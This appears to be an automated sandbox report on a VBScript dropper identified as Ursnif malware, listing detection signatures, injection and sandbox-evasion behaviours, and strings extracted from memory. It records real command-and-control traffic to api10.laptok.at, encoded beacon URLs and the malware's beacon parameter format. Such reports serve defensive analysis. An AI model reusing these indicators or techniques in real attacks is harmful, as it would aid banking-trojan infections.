Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name: my_presentation_96642.vbs
Analysis ID: 286676
MD5: 2e44ef40fba0da489e9c15ff7c64692c
SHA1: 2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256: bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: my_presentation_96642.vbs Virustotal: Detection: 14% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
Found Tor onion address
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Sep 2020 21:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.662624699.000000000E2C2000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
